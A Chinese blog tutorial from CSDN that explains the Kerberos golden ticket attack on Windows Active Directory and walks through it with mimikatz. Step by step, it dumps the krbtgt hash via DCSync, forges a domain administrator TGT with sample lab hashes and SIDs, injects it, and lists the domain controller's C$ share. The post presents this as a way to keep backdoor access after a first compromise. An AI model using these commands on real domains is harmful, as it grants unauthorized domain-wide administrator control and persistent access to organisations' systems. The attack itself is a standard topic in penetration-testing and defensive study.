域内横向移动技术——黄金票据攻击

最新推荐文章于 2024-08-08 14:16:40 发布
最新推荐文章于 2024-08-08 14:16:40 发布
阅读量2k 收藏 7
点赞数 4
分类专栏: 内网渗透 文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzgslh/article/details/106896431
版权

一、黄金票据攻击介绍

  • 黄金票据(golden ticket)攻击,是一种为任意用户生成TGT票据的方法,属于一种后门。黄金票据生成,是生成有效的TGT Kerberos票据,并且不受TGT生命周期的影响(TGT默认10小时,最多续订7天),那么,这里可以为任意用户生成黄金票据,就可以为域管理员生成TGT,普通用户就可以变成域管理员。

二、Kerberos认证流程

  • Windows 的认证协议主要有两种,一种是 NTLM 认证,另一种是 Kerberos认证。
  • 这里主要简单说一下Kerberos认证方式,这是一种基于票据的认证方式,有客户端、服务器和KDC(DC,Domain Controller)组成。
  • 认证流程:
    1.客户端向KDC的AS服务请求开具身份证明。
    2.AS服务认证成功后返回给客户端认证权证(TGT,黄金票据攻击需要伪造的票据)
    3.客户端拿着TGT到KDC的TGS服务买票。
    4.TGS认证成功后返回给客户端服务票据(ST)。
    5.客户端拿着ST去访问服务。
    6.服务向DC核实,返回相应的服务资源。
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fKhWr7oA-1592791189783)(.\images\0.png)]

三、黄金票据的制作条件

  • 1.域名称
  • 2.域的SID
  • 3.域控的Krbtgt账户的密码hash值
  • 4.任意域用户名

注意:

  • 制作域管的TGT票据,首先需要获取Krbtgt账户的密码hash,而Krbtgt账户的密码hash存储在域控制器上,因此需要活动域管理员权限。
  • 综上,是个死循环,所以黄金票据攻击,并不是一种普通的攻击方式,该攻击方式其实是一种后门的形式,属于第二次进行攻击的方法,第一次拿到域管权限之后,需要将krbtgt hash进行保存,当第二次再来进行渗透攻击时,我们就可以使用krbtgt hash制作黄金票据,从而获得管理员权限。

四、制作黄金票据,也就是伪造TGT

  • 1.获取Krbtgt的hash
    首先以管理员权限,在域控制器上执行mimikatz命令:
    privilege::debug
    lsadump::dcsync /user:krbtgt
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DreewOQd-1592791189788)(.\images\1.png)]

  • 记录Krbtgt用户的以下信息:
    Hash NTLM: 4c32d497137ce2fbc28c297e73a87889
    aes256_hmac: 414818be77de302b3801226cfe04599fb9aabfe114231a29d1386ee4d6507067

  • 2.域sid
    在普通域成员机器上,使用 “whoami /user” 获取。
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ptn89adf-1592791189789)(.\images\2.png)]

  • 记录普通域用户id信息:
    student01:S-1-5-21-3792756393-3386897061-2081858749

  • 3.域账户
    域账户:student01

  • 4.域名
    在普通域成员机器上,使用 “systeminfo” 获取。
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-R1wuM7cd-1592791189792)(.\images\3.png)]

  • 记录域名:college.com

制作黄金票据所需内容

Hash NTLM:4c32d497137ce2fbc28c297e73a87889
域名:college.com
域账户:student01
域sid:S-1-5-21-3792756393-3386897061-2081858749

使用mimikatz制作黄金票据

  • 在获取上面信息后,使用mimikatz工具生成黄金票据(普通域用户权限即可制作),过程如下:

  • 1.查看当前票据
    kerberos::list

  • 2.清空票据 #防止之前的票据对新作的票据产生影响
    kerberos::purge
    在这里插入图片描述

  • 3.制作黄金票据 /admin:用户名任意 /ticket:票据名称任意即可
    kerberos::golden /admin:administrator /domain:college.com /sid:S-1-5-21-3792756393-3386897061-2081858749 /krbtgt:4c32d497137ce2fbc28c297e73a87889 /ticket:ticket.kirbi
    在这里插入图片描述
    会在当前目录下生成黄金票据:
    在这里插入图片描述

  • 4.导入黄金票据
    kerberos::ptt ticket.kirbi
    kerberos::list
    在这里插入图片描述

  • 5.在普通域用户机器上,重新打开cmd窗口,可以直接列出域控目录
    dir \dc.college.com\c$
    在这里插入图片描述

  • 6.使用aes256也可以制作黄金票据。
    原理和上面的是一样的,只是hash不同而已。
    kerberos::golden /domain:school.com /sid:S-1-5-21-2236738896-1661306322-1924668396 /aes256:87d3913d6cb96fef6fcc7a616ee33625bec4b8cffc7a2efa7f177541dd7d3d9c /user:hello /ticket:aes256.kirbi

五、总结:

  • 黄金票据攻击相当于一个后门,制作黄金票据最重要的是获取到Krbtgt用户的hash。
zzgslh
关注
专栏目录
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1430
内网环境下的横向移动总结
内网 —— 跨攻击
战神/calmness的博客
12-09 817
目录 跨攻击的方法 利用信任关系的跨攻击 信任关系 获取信息 利用信任密钥获取目标的权限 利用krbtgt 散列值获取目标的权限 外部信任和林信任 利用无约束委派 和 MS-RPRN 获取信任林权限 防范跨攻击攻击的方法 都有自己的内网,一般通过进行共享资源。根据不同职能区分 利用信任关系的跨攻击 信任关系 获取信息 利用信任密钥获取目标的权限 ...
kerberos 票据_黄金票据(Golden Ticket)攻击
weixin_32252929的博客
12-25 2200
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 37 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更黄金票据在渗透测试过程中,攻击者往往会给自己留下多条进入内网的通道,如果我们忘记将 krbtgt 账号重置,攻击者就能快速重新拿到控制器的权限。假设内存在一个 SID 为 502 的账号 krbtgt 。krbtgt 是 K...
黄金票据攻击
Aquariusqsmy的博客
04-02 1031
通过这种方法,攻击者可以生成有效的TGT Kerberos票据,且这些票据不受TGT生命周期的影响(TGT默认生命周期为10小时,最多可续订7天)。在Windows系统中,攻击者还可以利用已获得的权限或漏洞进行票据提权,进一步提升自己的权限并获取黄金票据。具体来说,黄金票据攻击可以为任意用户生成TGT票据,这意味着攻击者甚至可以为管理员生成TGT,从而使普通用户获得管理员的权限。:SID(安全标识符)是唯一的,用于标识Windows操作系统中的安全主体(如用户账户、组账户等)。
嘎嘎好用的内网横向移动工具箱
最新发布
qq_69775412的博客
08-08 338
日常项目中,同事吐槽在进行内网横向的时候老是输命令输命令,贼烦。问问能不能整个图形化页面,然后就有了本项目。
第5章横向移动分析及防御
willow_liang的博客
12-26 3959
第5章横向移动分析及防御 横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用技术,以被攻陷的系统为跳板,访问其他内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和与业务相关的关键账户。因此,必须使用强口令来保护特权用户不被
权限维持-渗透攻击-Golden Ticket (黄金票据)
weixin_43227251的博客
04-13 1688
Golden Ticket (黄金票据) 简义 : 在拥有普通用户权限和 krbtgt账号的hash的情况下,获取管理员权限。 发生在上面的过程3,可以伪造TGT(前提是获取krbtgt账号的口令散列值(hash)),宣称自己是内任何账号,包括管或者不存在的用户。 1. 首先,黄金票据是全功能的TGT。也就意味着万能票据可用于Kerberos认证的任何服务。票据授予服务盲目地相信TGT中的信息,然后处理TGT并颁发服务票据。 内存中插入黄金票据并不需要提升权限。而且默认情况下,黄金票据的有效期是10
内网渗透之横向移动
hackzkaq的博客
11-18 590
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 hash 介绍 全在环境中,用户信息存储在控的ntds.dit(C:\Windows\NTDS\NTDS.dit)中; 非环境也就是在工作组环境中,当前主机用户的密码信息存储着在sam文件(C:\Windows\System32\config\SAM)。 Windows操作系统通常使用两种方法(LM和NTLM)对用户的明文密码进行加密处理。 LM只能存储小于等于14个字符的密码hash 如果密码大于14个,windows就自动使用NTLM
内网环境下的横向移动总结
hongduilanjun的博客
07-21 2690
前言在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集内凭证等各种方法,访问内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制环境下的全部机器。横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。...
『ADg防实践』第二期学习笔记
ZAWX_NETSTARSEC的博客
09-13 979
# 内信息收集与防御#内信息收集主要通过LDAP和SAMR两种方式: 1)LDAP信息收集原理:因为环境下所有的组、账户等对象都存储在Directory-Database中,而LDAP可以用来查询和更新目录数据库,所以通过LDAP协议可以快速收集很多内重要信息,比如管组、控、MAQ、组策略等。 2)SAMR信...
「运维有小邓」AD常见攻击之——黄金票据
运维有小邓
03-28 2542
“Golden Ticket Attack(黄金票据)”是一个特别丰富多彩的(如果你会原谅双关语)名称,用于特别危险的攻击。这个绰号来自罗尔德·达尔(Roald Dahl)的书 查理和巧克力工厂, 其中一张金票是令人梦寐以求的通行证,可以让其所有者进入威利旺卡戒备森严的糖果工厂。同样,成功的Golden Ticket(黄金票据攻击使黑客能够访问组织的整个 Active Directory
【网络安全】企业内网中的横向移动
HBohan的博客
08-25 1528
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
横向移动分析
qq_38675102的博客
12-31 906
windwos内网横移学习笔记
内网渗透之黄金票据
m0_70349048的博客
03-31 567
所以黄金票据攻击,并不是一种普通的攻击方式,该攻击方式其实是一种后门的形式,属于第二次进行攻击的方法,第一次拿到管权限之后,需要将krbtgt hash进行保存,当第二次再来进行渗透攻击时,我们就可以使用krbtgt hash制作黄金票据,从而获得管理员权限。黄金票据生成,是生成有效的TGT Kerberos票据,并且不受TGT生命周期的影响(TGT默认10小时,最多续订7天),那么,这里可以为任意用户生成黄金票据,就可以为管理员生成TGT,普通用户就可以变成管理员。黄金票据是用来维持权限的手段。
内网渗透学习04——横向移动
box
02-24 5676
文章目录0x00 Windows系统密码和Hash获取分析和防范1. Windows 系统密码和Hash获取1.1 使用工具将散列值和明文从内存中导出。1.2 通过SAM和System文件抓取密码1.3Mimikatz 在线读取Hash和密码明文1.4 Mimikatz 离线读取Hash和密码明文1.5 Nishang2. 防范密码和Hash凭证窃取0x01 哈希传递攻击和防范0x02 IPC1. IPC 入侵2. 计划任务 at schtasksatschtasks3. impacket 工具包
基于AD Event日志识别黄金票据攻击
12-18 598
01、简介黄金票据(Golden Ticket)是基于Kerberos认证的一种攻击方式,常用来做控权限维持。当攻击者获取到内krbtgt帐户的SID和HASH,就可以随意伪造内管理员用户,再加上帐户krbtgt的密码基本不会更改,即使管修改了密码,攻击者依然可以通过黄金票据获取管理员权限。在环境中,黄金票据无疑是一种特别危险的攻击,是控权限失陷的特征,基于AD Event日志如何...
简单的内网横向移动
m0_74326506的博客
07-23 1121
在内网中,通过网站漏洞打进一台机器,进行存货扫描,扫到不同网段的机器,然后经过代理打进不同网段的机器,这种叫纵向移动,如果扫到同网段的机器,而且这台机器除了正常端口开放外,没有安装其他任何服务,这可以经过横向移动,打进这台同网段的机器。sc命令可以用来注册删除查询系统服务,如果创建一个服务与木马绑定,则可以实现上线,但是一会就掉线,因为要和服务管理器进行通信,若是异常,明显这个创建的服务并不是正常的服务,所以服务管理器则会终止服务。创建成功,成功上线,删掉计划任务后,msf依旧不会掉线。
渗透——哈希传递、黄金票据
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-30 877
渗透 1. 安装 接着点击安装向导 加入: 需要设置dns服务器为控机 控可以登陆任意中的电脑 Windows认证协议 - Kerberos,也可以叫做票据 我们查看控 在cmd输入 net user /domain 还可以在dns里查看,一般dns都是控机 当我们获取到了administator的权限的时候,我们可以利用windows官方的工具去提权 指令: psexec -i -d -s cmd.exe//获取权限 然后再次输入net user /domain,就可以获取
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值